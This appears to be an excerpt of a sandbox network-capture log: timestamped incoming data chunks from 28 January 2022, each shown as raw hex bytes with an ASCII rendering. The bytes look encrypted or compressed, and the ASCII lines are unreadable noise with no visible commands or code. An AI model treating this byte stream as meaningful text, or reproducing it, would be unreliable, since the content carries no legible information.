                                                                                              2022-01-28 18:02:56 UTC1240INData Raw: 87 b6 c0 c9 0e ff 85 b1 43 08 b3 27 db 8e 3b f3 a9 0e 8b c1 2a 47 71 7e 76 0b 14 0f f2 49 62 d7 e0 1b 81 a7 7e 1f c4 d3 16 14 63 5a a2 7c 3a 70 8f cb 0a f5 bf 46 af 1d d5 7f c7 5b 2a 47 76 0b 58 be b0 a0 04 e6 42 85 dd 93 f5 d1 12 0a 9b ea 5c c8 af 1d d2 f7 85 b1 07 6d 07 6d 51 2c 6c f1 a6 86 14 0f ed bd 35 e4 05 68 94 58 9b ea 15 91 b1 22 13 8c 2d cf 08 f0 2d cf 1c 23 c6 d8 66 e2 00 db fa 5e a2 7c 74 06 85 b1 43 08 b3 27 da 0c 83 ac f4 4f 42 85 c3 51 59 40 f4 4f 47 12 59 40 88 39 97 e0 7a 15 f5 d1 1c 23 c7 5b 03 63 5c c8 a4 81 c6 d8 63 5a b0 a0 05 68 92 53 59 40 d4 fc 6b 6e 8f cb 04 e6 4f 26 4e a4 e4 25 d4 fc 07 6d 11 87 e1 9e 78 10 7c 1a 7f a2 18 19 ef c2 ab 13 f9 db da 0c fd e6 52 ae fa 5e a9 0e 91 d0 9d ef 8f cb 63 5a ba b9 56 b8 d0 f2 27 c0 bc bf 15
                                                                                              Data Ascii: C';*Gq~vIb~cZ|:pF[*GvXB\mmQ,l5hX"--#f^|tC'OBQY@OGY@9z#[c\cZhSY@knO&N%mx|R^cZV'
                                                                                              2022-01-28 18:02:56 UTC1243INData Raw: 21 85 c3 64 80 11 c1 7e 2f e1 84 1a 1a 2a a9 3a a8 bf 84 1b 0d 49 81 93 55 02 8b f5 85 85 8f ff c3 65 49 23 b9 03 62 e4 d4 cf b4 99 20 1d 09 40 19 af 9e 42 e8 03 37 da 32 6f 51 1f b9 05 94 6a 0a c7 8b f3 76 39 4a a8 05 5a bb 0e 9d dd df ab 25 88 19 ae 91 e1 6a dd 4d 10 cd 5b f7 e7 31 e8 b6 9e 05 59 2a 76 54 82 65 6e cf 5e ee 0e f2 79 65 6f 98 52 65 6f cb 55 aa a0 f1 f7 a6 b6 f5 e1 da 3c 58 8e 50 99 e7 ad 18 18 89 bc be 24 38 54 5f 6f af 22 f3 f3 66 dd 07 52 d0 cd 02 de 44 b5 11 b8 92 6c e5 97 ea 0b 87 88 d6 3f 24 06 28 7c b7 0c 6d 4a 1b 9f 9f ca b1 1c 1f 95 fc 5d 5a fe 92 6e 12 37 27 fd 5e f0 e6 16 98 5f 26 00 bb 01 14 32 68 da 2e 6f 61 68 ea 09 8e 74 e1 a2 ad 24 83 90 eb 8b 4e 98 1b 9d 8f f7 9c 50 9d d3 64 e0 13 b7 c0 f2 95 e1 58 85 01 65 c5 6d f0 7f cc
                                                                                              Data Ascii: !d~/*:IUeI#b @B72oQjv9JZ%jM[1Y*vTen^yeoReoU<XP$8T_o"fRDl?$(|mJ]Zn7'^_&2h.oaht$NPdXem
                                                                                              2022-01-28 18:02:56 UTC1247INData Raw: 13 cc dc e1 aa 41 36 fd d2 e9 81 0a c6 c5 64 10 37 7c 28 3a 42 82 1b 50 98 dc 20 b9 06 df a8 88 09 a9 3e c6 e8 9b da 8f fb bf 76 14 3f fc 63 5a c3 2d cf 6e d6 01 61 cd 55 4d 1e 1f 94 45 33 36 58 75 b6 2b f4 21 8e 77 b3 05 56 a8 b6 da 30 bf 7a be f8 0e c3 40 bb 6d 4f 10 3f 06 d1 bb 06 65 65 2e 6b 94 61 b1 1b 0a cc 6a d5 23 8c 4c a7 ae a3 ab 2b 8d fe 56 8f 24 0f 15 a6 ca d4 cf 58 b8 82 c3 67 fe 5e 49 22 fb d4 51 19 c5 63 57 0f 74 32 b3 13 27 f4 33 ed 6c c2 6b 5d 11 b5 fb d3 e3 91 e2 12 0d 4c 6a dd 48 a5 bb 0d 43 38 c7 6b c9 50 3c 46 07 5d 31 d9 89 bc 37 e9 b3 37 e9 8d bf 79 e0 24 63 64 dc 2c bd 7c f8 64 70 c6 70 c6 7c 27 60 ef 5e f0 dc 2c d8 3a e0 26 b1 1f 2f e9 d6 3c 22 0e af 20 62 ea 7d a0 33 e3 e3 9e 4d 1c 1b 9c 58 83 80 19 90 72 fc 5f a8 b7 c6 e4 d5 43
                                                                                              Data Ascii: A6d7|(:BP >v?cZ-naUME36Xu+!wV0z@mO?ee.kaj#L+V$Xg^I"QcWt2'3lk]LjHC8kP<F]177y$cd,|dpp|'`^,:&/<" b}3MXr_C
                                                                                              2022-01-28 18:02:56 UTC1251INData Raw: 3a 41 48 a5 41 33 e4 14 3d c9 4a ab 31 e8 2a 76 19 ad 12 3b f1 f7 2c 7c e8 00 31 e9 50 99 3f cd b8 84 e5 98 a0 47 a8 bb 8e 78 ba 89 1e 18 83 9c fe 58 34 51 ae ab 69 59 32 6c 9b da 6e c6 82 1a 4c af 57 0b 3a 40 b0 90 6d 44 9d df 93 d5 7f a1 1d a6 86 54 b3 27 c0 f6 ac aa 7b a7 d6 3e b7 0d ba 86 9d d0 6d 4b 8d f9 5e f2 3d c7 3f c2 85 8e 0e c0 f1 f8 69 56 b8 8a c6 e6 cf 51 f5 ef 0d 43 b9 09 0c c4 99 db cc d6 3b cd 58 80 0e c1 69 57 21 8e 58 83 53 0c 10 38 a8 b6 16 29 68 da a8 b6 34 5c 49 2a 3a 4d 57 06 9b d7 e8 0d 1b 9c 0e c2 95 e7 e3 9e 4c a2 5a fe 74 3b e1 a3 f5 ed 42 b9 ea 09 e7 91 c2 f5 3a 4b de 2d 88 02 ff d1 ee 08 ab 24 6c c6 90 79 ad 2f f5 e6 26 0a f3 fa 98 54 06 dd df af 58 88 14 39 f7 e0 14 3b 91 e4 65 6c 03 50 71 4d 9b d9 15 a0 ca d2 5a f2 60 d2 f7
                                                                                              Data Ascii: :AHA3=J1*v;,|1P?GxX4QiY2lnLW:@mDT'{>mK^=?iVQC;XiW!XS8)h4\I*:MWLZt;B:K-$ly/&TX9;elPqMZ`
                                                                                              2022-01-28 18:02:56 UTC1255INData Raw: 98 67 41 7c 1a 1b 84 43 08 f5 f4 15 91 d5 5a 87 b6 aa b5 1d a6 83 89 a2 7c 1f 8e 44 8a 3b d7 7e 1f ae bf ae 9b ef e6 f7 d6 04 c2 1e 28 47 36 dc 11 82 0e 5b 45 08 d4 68 e7 a8 af 61 55 33 fa 3a 70 fe 4c d1 75 8d e2 60 d2 f2 6d 52 ae 9e 55 20 2e 57 1f a3 fe 6d 57 c7 5b 40 a3 12 0a f0 67 ba b9 32 7f 60 d2 f2 6a 46 8f ce ce 7f a2 79 b1 58 be c4 d3 7a 15 91 d0 f2 49 17 97 e0 1b a1 f9 db 8e 48 94 58 be c1 68 83 ac 90 63 d0 f2 49 17 97 e0 1b a1 f9 db 8e 48 94 58 bb 1f eb b7 37 c5 be c4 d3 7a 15 91 d0 f2 49 17 97 e0 1b a1 fc 40 b8 b4 af 31 13 8c 43 08 f0 44 8a 3e 7b 98 62 d7 84 2f d1 56 88 39 eb 9b 5e cd 6a ec 3a 70 fb e1 9e 71 7e 1f ab 13 89 9f ec 3a 75 a4 df 99 e5 a8 8b c1 4b 1c 23 b5 2d cf 6f 79 97 c2 ce ed b8 93 41 02 e1 9e 71 7e 1f ab 13 8c 43 08 f0 44 8f ea
                                                                                              Data Ascii: gA|CZ|D;~(G6[EhaU3:pLu`mRU .WmW[@g2`jFyXzIHXhcIHX7zI@1CD>{b/V9^j:pq~:uK#-oyAq~CD
                                                                                              2022-01-28 18:02:56 UTC1259INData Raw: 37 e9 b2 a7 09 73 83 a0 3a 3d b5 0a 9a 08 9f b0 3d 65 c2 94 ff 4c 38 71 0d 0e 8c 51 2c 4c 9f 7b 0b eb 2d 54 28 d9 21 35 7c 82 b5 48 0e 61 fb b9 a2 e5 0e bb ac 01 ff d2 7f 25 3d dd 19 14 8c 59 cb ec bd 48 12 89 3c 77 8d c6 d8 06 eb b7 32 5d 4a 9a 67 64 23 4a 65 5f af e2 df 99 1a e1 61 55 c9 9f 0b 78 10 05 68 e7 ad 18 19 9c 6c f1 c7 5b 45 0d 7d 9d ef c2 ce ef c2 ce ed b0 a0 77 8d 9e 06 9c 1b 1a b3 8a 93 00 67 d8 bb d5 ab c7 88 c6 31 30 be 3b 18 f2 a6 1d 32 c8 48 db 88 3f fb 1c 9b 53 eb 48 5d 84 d0 0d bf 8c b9 c8 67 a1 09 8c f7 14 e4 da bd 80 ce 15 3b 4e 44 61 f0 fc b8 55 a8 3b 38 b8 2f 7f 60 1b 37 40 3f 41 91 75 30 fd 74 99 49 98 ed 2e c4 ab 9c fd 74 3b 63 ca 73 83 53 ce 12 0a f5 d1 75 88 39 ee 3f fd e6 2b ca e3 a3 fe 68 e7 ad 18 19 95 da 0c fa 71 7e 1f ab
                                                                                              Data Ascii: 7s:==eL8qQ,L{-T(!5|Ha%=YH<w2]Jgd#Je_aUxhl[E}wg10;2H?SH]g;NDaU;8/`7@?Au0tI.t;csSu9?+hq~
                                                                                              2022-01-28 18:02:56 UTC1263INData Raw: 11 87 b6 af 1d 66 e2 20 11 87 b6 af 1d 66 e2 20 31 d9 89 bc bf 86 34 61 52 ae 9b ea 35 24 38 6b 69 69 69 69 69 a9 0e ff e8 30 57 3b f3 0c fa 5e cc e8 30 57 3b 33 de 16 15 91 d0 f2 49 d7 84 2f d4 fc 63 5a c3 91 d0 f2 49 17 97 e0 1b 61 55 36 66 e2 20 2e 52 6e f6 54 b3 27 c0 c9 60 12 0a f5 d1 75 88 39 ee ff eb b7 32 5c c8 dd 93 15 91 d0 f2 49 17 97 e0 db 8e 48 94 58 be c4 d3 ba b9 37 e9 b2 a5 03 63 9a 67 64 dc 11 87 b6 af dd 93 d5 7f a2 7c 1a 1e e8 30 57 3b f3 cc e8 30 97 e0 1b a1 f9 db 8e 48 54 b3 27 c0 c9 60 d2 f7 16 14 0f 82 2a 47 12 0a 35 e4 25 bb 3c 76 0b 78 d0 f2 49 16 14 0f 82 2a 87 b6 af 1e 28 42 85 b1 e2 20 2e 51 2c 4c 9f f4 8f cb 65 58 be c4 d3 7a d5 7f a2 73 83 ac 95 da cc e8 30 48 94 58 be c4 13 8c 43 37 e9 b2 a5 03 83 ac 95 25 ba b9 37 e9 42 85
                                                                                              Data Ascii: f f 14aR5$8kiiiii0W;^0W;3I/cZIaU6f .RnT'`u92\IHX7cgd|0W;0HT'`*G5%<vxI*(B .Q,LeXzs0HXC7%7B
                                                                                              2022-01-28 18:02:56 UTC1268INData Raw: a1 06 90 8c bc 40 fb 23 4a 65 24 fa a1 06 90 8c bc 40 fb 23 4a 65 24 fa a1 06 90 8c bc 40 51 ce 1f 54 00 17 71 81 a7 62 06 14 0f f7 0d 82 53 89 57 c4 68 5c 73 cb 10 70 8e 48 6b 91 2f d4 fc 63 5a c3 51 2c 4c 9d ef c2 ce f1 c7 5b 45 8d e0 3d c2 31 b3 4d be 3b 60 41 f0 bb a7 92 ac 6a 4d 80 db 71 d9 2e ad e7 00 76 f4 b0 13 3f 02 1e 91 69 96 a2 c2 70 04 19 59 85 4e 5b 8e 83 53 ce 21 7c e5 57 e9 60 2d 30 81 71 81 58 60 0c 05 97 1d 5b ba 46 70 04 19 63 a5 fc 9c 93 2a b8 4b e3 5c 37 16 eb 48 6b 91 2f 58 32 ef 3d 8b b4 06 14 82 92 ac 6a 65 98 9d 10 8c 84 d0 0d f4 88 c6 27 49 d0 0d 82 a3 39 11 78 99 22 cc 17 1e ef 3d 07 e4 e2 df 66 6b a9 f1 38 e2 e7 52 51 a5 c4 2c b3 f4 ad e8 cf dd 5d ad e7 ad 6d af e2 20 51 c8 22 4b a7 e4 da b6 15 2b 82 5e b9 43 08 0f 7d 62 d7 84
                                                                                              Data Ascii: @#Je$@#Je$@QTqbSWh\spHk/cZQ,L[E=1M;`AjMq.v?ipYN[S!|W`-0qX`[Fpc*K\7Hk/X2=je'I9x"=fk8RQ,]m Q"K+^C}b
                                                                                              2022-01-28 18:02:56 UTC1272INData Raw: d3 8b 39 11 78 e1 66 1d 59 b1 da f3 33 2f 2c b3 d8 f6 ac 6a 13 7d 65 a0 88 d8 e3 4b e3 69 a3 34 9e ba 72 cb 9a b4 79 41 fd 21 77 4a 69 14 72 7d b4 f9 88 6a ec c5 a9 f1 c7 5b 45 0d 7d 9d ef c2 ce ed bd 41 02 e1 9e 71 7e 1f ab 13 88 39 ee 3f e1 9e 71 7e 4b 1c 23 b5 bf 46 8f cb a5 19 86 12 f9 8c 14 8d 39 96 25 1c dc af a3 27 3f 18 fc 96 a2 94 b0 5f af fe 8b 3e 84 f2 94 a7 f6 8c 9b 15 6e 24 ea ca 1c e8 fb 1e d7 43 cf 90 b1 e2 e0 e4 da 96 c7 82 d5 0f f2 ef 28 11 d4 81 73 b4 9d d0 1b ee 70 b4 51 48 f0 20 d1 0d 03 e6 d4 73 1e 82 d5 be 07 aa 6f 9d 07 81 58 48 6e 09 8c b5 d7 7b 67 92 a9 f1 38 9d 15 6e 09 85 4b e3 5c 3e 81 58 41 f4 b5 d2 08 06 11 78 ef 20 ca 04 19 4c 4f f6 ab c2 1f 7a ea 84 9e c0 2e 37 8c 26 68 dc 2a 7c 1c 23 b5 2d cf 90 b1 dd 93 d5 7f a2 7c 1a 1e
                                                                                              Data Ascii: 9xfY3/,j}eKi4ryA!wJir}j[E}Aq~9?q~K#F9%'?_>n$C(spQH soXHn{g8nK\>XAx LOz.7&h*|#-|
                                                                                              2022-01-28 18:02:56 UTC1275INData Raw: 49 4b 14 d6 d6 d6 d3 cc 4e 29 16 c4 21 41 03 5d 7f cc 88 64 83 83 b8 a4 e4 83 61 61 57 00 87 81 90 79 83 75 5a 0f 4e 18 be 49 c9 8d 9f 06 ea 0b 4d 60 a9 88 bf c0 c5 5a ea ab dd 89 ba 81 bc e3 94 45 3b 38 a2 b6 65 e3 3d 76 ef 79 61 a7 08 ce af 20 44 fd 91 a7 5a c1 2f b1 47 1d a0 46 a7 12 56 a5 64 19 54 79 5b f8 c6 56 e0 a0 83 f5 d0 cc ae ef 95 8d 91 3c 9a 61 50 a0 7e 1a 0e dd b6 83 b7 21 c4 16 d3 b3 ef 7f 3d 76 da e2 d5 8c 42 84 d2 dc 5f bc 53 dd 7f 4e b0 a7 0e f5 cf 79 b0 85 9d f4 f6 91 17 5f 97 5d dd 1d 79 7c ef 31 d8 06 12 3f e8 dc fd 0a 19 d1 2e 7e 3a 52 8f d5 5f 72 28 66 22 f6 92 94 9e cf ea bb d7 65 a9 fd e7 ac 94 a6 ad 51 c0 25 56 fb bd 1a 32 7a 0c db 90 6e ee 5a 01 9b 2f 11 42 3b 5b c3 a7 0d a6 75 89 bd 40 7a 53 1f e5 44 dc 05 75 bf 1d 8a 18 00 fa
                                                                                              Data Ascii: IKN)!A]daaWyuZNIM`ZE;8e=vya DZ/GFVdTy[V<aP~!=vB_SNy_]y|1?.~:R_r(f"eQ%V2znZ/B;[u@zSDu
                                                                                              2022-01-28 18:02:56 UTC1279INData Raw: a1 56 b8 01 eb 02 e1 27 79 2b ca 58 05 d3 7a ab ad a6 86 f5 10 c4 d3 bc 79 54 b3 eb 7b 54 b3 f1 11 51 2c 96 87 6c f1 1b 7d 41 02 3f 23 6b 6e 16 f4 af 1d 44 68 05 68 03 87 52 ae 7d 7b 7e 1f 42 6c 18 19 77 66 09 73 6d 9a 89 bc 4d d3 88 39 17 6e 0f 82 d5 80 db 8e f2 25 f6 54 4a 0f b7 32 8b 70 71 7e e3 0d 34 61 fc f3 ec 3a a4 4c cd 6a 0d a2 db 8e d8 f6 0f 82 47 f3 84 2f 85 7f 97 e0 27 01 76 0b 48 23 96 5d 69 d9 9e 71 68 4f 29 c5 55 ac 97 e0 01 d2 d1 75 fc a5 83 ac d3 c8 85 b1 11 07 20 2e fc be 7b 98 34 d3 f5 d1 3d 8d ac 95 0f 5a 1a 1e 53 9f 37 e9 08 4c 22 33 3d 15 62 d7 6a 14 f1 c7 36 df 72 00 21 4d de 16 a2 a7 fc 63 f4 9c 80 24 a3 35 0f 82 bc 70 0d 7d e1 56 43 08 88 fd 11 87 c3 ee cd 6a d8 ad e3 a3 e5 0a 0a f5 d4 69 90 4e 1d 6f ac 95 10 db 63 5a 71 ae 7c 1a
                                                                                              Data Ascii: V'y+XzyT{TQ,l}A?#knDhhR}{~BlwfsmM9n%TJ2pq~4a:LjG/'vH#]iqhO)Uu .{4=ZS7L"3=bj6r!Mc$5p}VCjiNocZq|
                                                                                              2022-01-28 18:02:56 UTC1295INData Raw: ba 99 e5 a8 8b c0 89 bc ae 5b 45 0d 7d 9c 2c 4c 8e c8 dd 93 d5 7e 5f 50 b8 e4 25 ba b9 36 26 3d e9 82 2a 47 12 0b 38 6b fc 03 63 5a c3 51 2c 4c 9f f4 4f 26 3d f9 9b ea ae 7b 98 62 d7 85 f1 c7 64 ec 3a 70 fb e1 9e 71 7e 1f ab 13 8c 43 08 f0 87 6c f1 c7 5b 45 0d 7d 5e 1d a6 86 34 61 55 36 a6 08 f0 44 8a 3e 7b 98 a2 b8 b4 aa 90 4e a4 81 67 b4 aa 90 4e a4 81 a7 c9 be c4 d3 7a 15 91 d0 32 b0 a0 77 8d c6 d8 07 ac 3b f3 cc e8 30 57 3b 32 ca e3 a3 fe 68 e7 ad d8 f9 db 8e 48 94 58 be 05 78 10 05 68 e7 ad 18 d8 1f ab 13 8c 43 08 f0 85 91 d0 f2 49 17 97 e0 da 26 3d f8 59 40 80 24 f9 e5 a8 8b c1 4b 1c 23 74 4c 9f f4 4f 26 3d f8 98 00 db 8e 48 94 58 be 05 04 e6 2b ca e3 a3 fe a9 78 10 05 68 e7 ad 18 d8 89 bc bf 46 8f cb 65 9e c9 60 d2 f7 d6 01 5e 0d e1 9e 71 7e 1f ab
                                                                                              Data Ascii: [E},L~_P%6&=*G8kcZQ,LO&={bd:pq~Cl[E}^4aU6D>{NgNz2w;0W;2hHXxhCI&=Y@$K#tLO&=HX+xhFe`^q~
                                                                                              2022-01-28 18:02:56 UTC1307INData Raw: 76 c7 a4 7e e4 a6 6f b5 e1 52 62 1b 6d b8 78 dc dd 50 f4 46 06 aa 5a c8 d9 68 26 3d f0 44 8a df 18 99 9a e7 9a 85 30 9d 64 0d 4e a4 c1 4b 1c c1 ca 32 6f 7d 7f 63 8b 4a 59 ca a2 b4 99 e5 88 39 ee de 97 28 71 7a f4 8e 80 af 1c 10 44 8a 2e 52 ae be c5 65 1e 2c ac 54 b2 2e 13 94 59 0c fa d5 36 b7 36 ef 8a 2e 17 1c 6b 7e 94 10 0d 35 6f 30 57 b0 e9 a6 d3 f3 88 3d 13 98 27 49 68 07 ee 27 28 83 a7 70 3b 76 0a 7e 5e d5 7e 53 31 52 e7 7c 1e a1 b1 22 33 de 13 9c 29 02 f1 82 a1 b1 32 d7 cc e0 53 ba f0 44 01 17 83 e9 3b 8c a3 7d 85 59 81 ae 70 ef 97 69 2d c9 19 5c 4d 20 a5 42 9d ee 73 83 27 89 6d 70 72 48 84 72 89 f8 49 52 25 f2 59 cb 2d c7 13 07 24 38 e0 52 ba ec b3 63 5e 26 29 80 ad 18 19 9d 10 20 28 aa 51 21 c3 5e 2d 75 87 b7 b9 76 13 8d 8a 3e f0 0d ac 91 59 08 f0
                                                                                              Data Ascii: v~oRbmxPFZh&=D0dNK2o}cJY9(qzD.Re,T.Y66.k~5o0W='Ih'(p;v~^~S1R|"3)2SD;}Ypi-\M Bs'mprHrIR%Y-$8Rc^&) (Q!^-uv>Y
                                                                                              2022-01-28 18:02:56 UTC1323INData Raw: f1 f8 4c 60 75 f5 5a 87 70 70 b2 02 a4 08 f6 df 3e 36 eb ff 4c da 85 76 5e 40 c8 db 05 99 a0 78 5c 37 16 e8 ea 38 e6 63 a5 fc 9e 90 7b 15 dd 53 b4 6d 39 67 2c 8c d7 8b 0e 82 a3 51 61 d8 4f f1 b2 2c 00 24 c7 a4 7a d2 00 db 8e 48 4d c8 62 92 da ca 68 a6 85 5a 00 50 68 92 5d fb ee cf af 96 1c 80 69 e2 83 e9 3b 5c bd c8 99 ed 75 0b 72 75 80 8c e0 5e 46 2c 09 fa 9c 67 c7 1e a3 d7 f0 86 0f 2d 92 da ce ce 4e e1 15 32 19 17 d3 d9 cc 61 53 ba 1a 5b cc ee b4 35 b1 a9 0e fe 68 e7 32 19 5b 42 6e f6 50 a9 0e 60 97 27 d0 19 9c 6e f6 54 2c 09 b4 b3 cc e8 38 6b 6e 69 2c 8b e3 d6 cf 54 f2 47 66 e1 77 0e e3 d7 4a b1 63 70 8f c9 89 3f 62 8a b7 fd 6d 74 06 eb 4e 2b c5 51 d4 7f e3 a3 fe 68 71 f0 4b 19 64 5f 11 93 ab 10 fd 65 1e 28 42 85 17 19 93 13 b7 77 8d c6 d9 95 52 a1 39
                                                                                              Data Ascii: L`uZpp>6Lv^@x\78c{Sm9g,QaO,$zHMbhZPh]i;\uru^F,g-N2aS[5h2[BnP`'nT,8kni,TGfwJcp?bmtN+QhqKd_e(BwR9
                                                                                              2022-01-28 18:02:56 UTC1339INData Raw: 4e a4 81 a7 09 73 dc 4e c0 a7 6c ae c4 d3 78 10 05 68 ee 3f fd e6 6b 6e f6 2e 0d 11 ff b4 f5 d1 77 8d c6 d8 0f 82 2a 45 39 ee 3f f3 2f d4 fc 63 5a c3 53 31 d9 89 b4 aa 90 4f b2 a5 03 6d a1 f9 db 8e 48 94 5a c3 51 2c 4f 26 3d fa 5e cd 6a e2 9f f4 4f 26 3d f8 5b 45 0d 7d 95 da 0c f8 85 b1 22 3d 48 94 58 be c4 d3 78 10 05 97 1f ab 13 8c 47 12 0a fb 7a 15 91 d0 f2 49 15 91 d0 f2 48 94 58 a7 81 a7 09 7d 1c 23 b5 2d cf 6f 7b 98 62 d7 8c 43 08 f1 1b a1 f9 d5 1e 28 42 85 b1 22 31 d9 89 43 f7 d6 01 5c c8 dd 93 db c0 c9 60 d2 f7 d6 03 63 5a c3 59 40 80 26 89 bc bf 48 d5 7f a2 7c 1a 1e 2a 47 12 0a fd e6 2b c8 11 87 b6 a1 cd 6a ec 3a 70 fb e3 a3 fe 68 ef c2 ce ec d6 01 5e c3 47 12 0a f5 d1 75 8a 3e 7b 67 9b ea 35 e4 25 ba b9 39 ed bd 41 02 e1 9e 73 83 ac 95 d2 f7 d6
                                                                                              Data Ascii: NsNlxh?kn.w*E9?/cZS1OmHZQ,O&=^jO&=[E}"=HXxGzIHX}#-o{bC(B"1C\`cZY@&H|*G+j:ph^Gu>{g5%9As
                                                                                              2022-01-28 18:02:56 UTC1355INData Raw: ab 13 8c 2d a6 e7 c0 96 02 e1 9e 71 7c 1a 1e 28 42 85 b1 22 33 de 17 97 e0 1b a9 0f 81 a7 09 73 80 24 38 6a 9c 6c f1 c4 79 92 53 31 d9 89 be c4 f3 cc e9 b2 a5 0a 25 ba b9 34 f9 db 8e 48 94 58 bd 41 02 e1 9c 6c f1 c7 5b 45 35 d4 ce de 21 9e 01 5e cd 6a ec 3a 70 fb e1 9e 71 7e 1f ab 13 8c 43 08 f0 45 0f 82 0a f5 d0 f2 49 1e b8 b4 aa 93 53 31 d9 89 bc bf 46 8f cb 65 5f 50 a9 0e 9c 42 eb de 77 e0 78 73 e4 24 5f 50 a9 f1 39 ee 3f fd 25 ba b9 37 8c 2f bd 27 ee 3f fd e6 2b ca e3 a3 fe 68 e7 ad 18 19 9a 67 64 dc e9 b3 24 38 6b 6e e6 2b ca e2 88 39 ee 3d 92 53 31 d9 89 bc bf 46 8f cb 65 5f 50 a9 0e ff eb b7 32 5c c8 dd 82 2b c9 60 d2 f7 d5 7f a2 7e ef c2 ce ef 9d ef c2 ce ed bd 41 02 e1 9e 71 7e 1f ab 13 8c 43 08 f0 44 8a 3e 72 01 5d 4a 9a 67 75 88 39 ee 72 00 db
                                                                                              Data Ascii: -q|(B"3s$8jlyS1%4HXAl[E5!^j:pq~CEIS1Fe_PBwxs$_P9?%7/'?+hgd$8kn+9=S1Fe_P2\+`~Aq~CD>r]Jgu9r
                                                                                              2022-01-28 18:02:56 UTC1371INData Raw: a3 fe 68 31 46 d7 85 42 85 b5 2d cf 6f 79 92 53 31 0f 82 2a 47 12 0a f5 d1 a0 2a 47 13 8c 43 08 f0 44 8a 3e ae 9b ea 35 e4 25 ba b9 a3 a6 86 35 e4 25 ba b9 37 e9 b2 31 d9 89 bc bf 46 8f cb 35 e4 25 ba b9 37 e9 b2 a5 03 63 5a c3 51 2c 4c 9f 6b 3f fc 90 4e a0 77 8d c6 d8 07 6d 76 80 24 38 6b 6e f6 54 b2 3f ac 95 db 8e 48 94 58 be c4 d2 6d 74 06 eb b7 32 5c c9 f3 53 60 d3 89 bc bb 3c 76 0b 78 10 05 69 fa 5e cd 6a ec 3a 70 fa 57 6a ec 3b f3 cc e8 30 57 3b f2 40 80 24 38 6b 6e f6 54 65 c0 98 63 a9 0e fb e1 9e 71 7e 1f ab 13 5a c3 51 2c 4c 9f f4 4f b2 f4 4f 27 c0 c9 60 d2 f7 d6 01 ca e3 a3 fe 68 e7 ad 18 49 17 97 e0 1b a1 f9 db 8e 48 94 58 be c4 d3 7a 15 cd 6a ed bd 41 02 e1 9e 71 7c 91 d0 f2 49 17 97 e0 19 80 bb 6e f7 25 ba bd 41 02 e1 9e 71 7e 1d ba b9 37 e9
                                                                                              Data Ascii: h1FB-oyS1*G*GCD>5%5%71F5%7cZQ,Lk?Nwmv$8knT?HXmt2\S`<vxi^j:pWj;0W;@$8knTecq~ZQ,LOO'`hIHXzjAq|In%Aq~7
                                                                                              2022-01-28 18:02:56 UTC1387INData Raw: 31 b5 49 79 f3 84 43 64 98 0a f2 d5 7e 1f ab 13 8c 43 08 f0 42 85 b1 22 33 b7 fa 76 3b f3 cc e9 8d cb 64 dc 65 31 b0 cf 3f 84 5d 3e 15 d4 90 22 77 8b c1 2e 3e 19 e9 dd f7 f6 33 b0 cf 03 67 74 04 e6 4e c8 bf 33 b1 46 8b c9 62 d7 84 2e 6f 78 9e 72 00 9e 3d bc f1 86 7c 1f ab 67 0a 9c 4c eb c5 39 86 47 17 95 d8 07 1f ca 8b a2 5c ac f0 2a 20 47 61 53 30 55 36 66 e3 9e e8 32 5c 8c 0a ba ef 92 1f af 1d d2 96 32 30 31 dd 97 e2 20 2e 53 26 b0 a2 7c 5e 9f bb 6b 2a 43 08 f0 44 62 54 b1 22 7f ed f2 0b 7c 12 09 73 f1 a6 ee 5c e8 54 d6 6f 1e 41 71 10 70 f3 cd 68 e7 d9 e7 c4 f3 a8 ee 51 4b 75 fb 8f be e4 42 eb d8 6b 69 6d 76 0b 1d d6 78 64 b9 4d 48 e7 aa 98 60 d2 83 c2 a7 29 a1 9c 02 86 5d 39 80 51 2b ce ef c2 ba d7 ed 9d 88 57 54 df 9c 68 e5 a8 ff 85 d8 02 e5 aa 90 3a
                                                                                              Data Ascii: 1IyCd~CB"3v;de1?]>"w.>3gtN3Fb.oxr=|gL9G\* GaS0U6f2\201 .S&|^k*CDbT"|s\ToAqphQKuBkimvxdMH`)]9Q+WTh:
                                                                                              2022-01-28 18:02:56 UTC1403INData Raw: de 58 f7 99 a6 82 2a 47 13 11 12 0b 7c 1a 5b 16 55 74 52 e7 e3 ea 7a 56 df f8 2d cc e8 55 5a a1 8c 2c 28 62 b0 ce 82 46 8b d1 77 8d a3 92 31 ac fa 3a 74 0e fd e6 5f 3e 12 2a 33 ac fa 36 15 94 5a c1 4b 6e 97 88 5a e3 c7 3e 15 f6 3d 8b c7 5a c1 4b 68 86 5b 29 a3 fa 5a c1 4b 6e 97 88 5a e3 c7 3e 15 f6 3d 8b af 68 ef c3 53 31 ad 76 62 f7 b2 c0 a7 6e 9f 87 d8 72 20 49 79 fd 8a 39 ea 37 e9 d7 f4 36 12 6f 03 0a 86 33 d6 03 63 2e 3c 1f 8b a5 66 8c 24 51 5f 3e 0e f8 5d 48 94 2c 22 5a e3 c4 bd 2e 3e 7e 1b a3 fe 1c 4d 48 91 d4 fe 68 93 bb 55 16 70 9e 1f cc 81 d4 92 26 1d d2 85 de 7e 6c f6 56 ba b9 43 66 8b e1 f9 b5 42 e9 92 34 0f ed d1 70 f3 ce ed c9 0e 96 7d f9 be aa f7 bf 35 8a 4b 3c 11 e9 dd ff cb 02 8f a4 ed ba b1 20 2e 20 4f 4e c7 5d 4b 1e 28 42 8f fa 5e ae b5
                                                                                              Data Ascii: X*G|[UtRzV-UZ,(bFw1:t_>*36ZKnZ>=ZKh[)ZKnZ>=hS1vbnr Iy976o3c.<f$Q_>]H,"Z.>~MHhUp&~lVCfB4p}5K< . ON]K(B^
                                                                                              2022-01-28 18:02:56 UTC1419INData Raw: 11 c4 d6 01 5e cc 5c 5d 48 90 4e e1 cd 2b 88 6d 3d b6 e6 64 9f 93 b4 de 12 0a 90 22 51 59 2f b0 80 43 66 8d aa 94 48 96 5d 2f b8 d6 74 69 0d 79 9a 65 5f 24 56 d1 55 42 f7 b9 5f 23 b0 a2 7e 1f d9 e8 58 dd b3 43 6d 1a 79 fb 92 55 37 eb b7 46 ee 50 c5 30 53 35 e6 23 b6 af 6f 18 71 1d 86 50 cc 86 53 58 cd 04 93 dd 92 51 2c 38 05 01 7e 7b fd 88 5e a4 f2 27 b5 0d 1a 70 94 34 66 e6 29 c5 33 ae e2 54 d6 7b f1 b4 ad 10 07 6d 00 b5 44 aa f4 2a 29 a2 15 e2 4e d1 72 04 e4 25 ce 83 c5 76 6c 9f 9b 86 31 dd 91 d0 86 5a aa 95 de 14 0f f6 3a 19 bc db eb d9 ee 56 cb 0b 0d 5d 3e 09 1c 4b 6f 7e 1d a4 81 d3 14 66 c2 a9 60 bd 2d ef a5 6d 1b cd 6f 71 7c 1a 6a 82 43 28 